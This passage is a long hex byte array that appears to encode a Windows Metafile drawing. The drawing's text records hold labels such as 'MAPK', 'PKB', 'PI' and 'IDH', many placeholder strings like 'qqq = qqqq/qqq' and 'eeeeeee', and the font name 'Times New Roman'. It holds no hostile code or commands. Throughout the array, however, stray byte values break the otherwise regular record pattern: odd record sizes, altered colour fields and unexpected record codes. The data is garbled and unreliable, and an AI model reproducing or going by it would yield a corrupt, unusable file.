	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE8, 0x00,
	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x7C, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA9, 0x00,
	0x08, 0x00, 0x00, 0x00, 0x74, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x06, 0x00, 0x09, 0x00,
	0x08, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
	0xBA, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0x07, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xF1, 0x00, 0x06, 0x00, 0x00, 0x00, 0x6B, 0x69,
	0x74, 0x61, 0x73, 0x65, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x81, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0x2A, 0x00, 0x06, 0xEF,
	0x00, 0x00, 0x4D, 0x41, 0x50, 0x4B, 0x20, 0x3D, 0x12, 0x00, 0x0D, 0x00, 0x0C, 0x00, 0x0E, 0x00,
	0x05, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02,
	0x78, 0x00, 0x07, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0F, 0x00,
	0x05, 0x00, 0x06, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xBE, 0x00,
	0x11, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x09, 0x00, 0x24, 0x00, 0x06, 0x00, 0x05, 0x00, 0x09, 0x00,
	0x0A, 0x00, 0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x3C, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x7E, 0x00, 0x00,
	0x32, 0x0A, 0x61, 0x02, 0x49, 0x01, 0x06, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x0B, 0x00, 0x05, 0x00, 0x0A, 0x7E, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2D, 0x01, 0x01, 0x00, 0x07, 0x00, 0x00, 0x00, 0x1B, 0x04, 0x84, 0x02, 0x92, 0x03, 0x28, 0x00,
	0xC8, 0x01, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01,
	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xEB, 0xFF, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC1, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0xD2, 0x01, 0x0E, 0x00,
	0x00, 0x00, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x71, 0x2F, 0x71, 0x71, 0x71,
	0x13, 0x00, 0x0E, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0D, 0x00, 0x06, 0x00, 0x13, 0x00, 0x0F, 0x00,
	0x0E, 0x00, 0x11, 0x00, 0x06, 0x00, 0x0E, 0x00, 0x0F, 0x00, 0x11, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x1F, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0xD0,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0x96, 0x02, 0x06, 0x00, 0x00, 0x00, 0x71, 0x71,
	0x71, 0x71, 0x71, 0x71, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x16, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0xD2, 0x01, 0x0A, 0x00,
	0xD0, 0x00, 0x71, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x13, 0x00, 0x0E, 0x00,
	0x11, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x14, 0x00, 0x0E, 0x00, 0x11, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x7C, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x0A, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0x65, 0x02, 0x06, 0x00,
	0x00, 0x00, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00,
	0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0x2E, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x75, 0x00,
	0xD2, 0x01, 0x24, 0x00, 0x00, 0x00, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71,
	0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71,
	0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x71, 0x20, 0x42, 0x20, 0x0F, 0x00, 0x0E, 0x00, 0x05, 0x00,
	0x0B, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0F, 0x00, 0x05, 0x00,
	0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00,
	0x08, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0C, 0xD4, 0x08, 0x00,
	0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0F, 0x00,
	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x8F, 0x00, 0xD2, 0x01,
	0x17, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0F, 0x00,
	0x10, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00,
	0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0F, 0x00, 0x08, 0x00,
	0x0C, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00,
	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x82, 0x00, 0x00,
	0x14, 0x02, 0x00, 0xF4, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xD2, 0x01,
	0x02, 0x00, 0x00, 0x00, 0x50, 0x49, 0x0E, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0xE5, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF3, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x35, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xE7, 0x01, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x1D, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0xEE, 0x01, 0x01, 0x00,
	0x00, 0x00, 0x33, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x43, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0xA8, 0x00, 0xFE, 0x01, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0C, 0x00,
	0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0x3D, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0x4F, 0x02, 0x14, 0x00,
	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0C, 0x00,
	0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x0B, 0xB9, 0x06, 0x00, 0x06, 0x00,
	0x0B, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x04, 0x4B,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x38, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0x08, 0x03, 0x01, 0x00, 0x00, 0x00,
	0x7E, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00,
	0x0F, 0x03, 0x01, 0x00, 0x00, 0x00, 0x33, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x9E, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xA8, 0x00, 0x20, 0x03, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
	0x65, 0xFA, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x01, 0x00, 0x22, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xC2, 0x00, 0xD2, 0x01, 0x12, 0x00, 0x00, 0x00,
	0x50, 0x4B, 0x42, 0x2C, 0x20, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x0E, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x11, 0x00,
	0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x93, 0x00,
	0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0xC2, 0x00, 0x94, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0C, 0x00,
	0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0xD2, 0x02,
	0xFF, 0xFF, 0x2F, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0xCE, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xC2, 0x00, 0xD3, 0x02, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x20, 0x43, 0x20, 0x0F, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x05, 0x00,
	0x0F, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xDC, 0x00,
	0xD2, 0x01, 0x0B, 0x00, 0x00, 0x21, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x20, 0x65, 0x65,
	0x65, 0x00, 0x0F, 0x00, 0x10, 0x00, 0x07, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00,
	0x06, 0x00, 0x10, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x60, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x8F,
	0x32, 0x0A, 0xDC, 0xD3, 0x53, 0x02, 0x01, 0x00, 0x00, 0x9E, 0xB9, 0x00, 0x07, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0xDA, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x01, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xC6, 0x00, 0x5A, 0x02, 0x0E, 0x00, 0x00, 0x00,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x49, 0x44, 0x48, 0x0B, 0x00,
	0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
	0x0B, 0x00, 0x06, 0x00, 0x08, 0x00, 0x10, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x83, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xDC, 0x00, 0xE4, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9B,
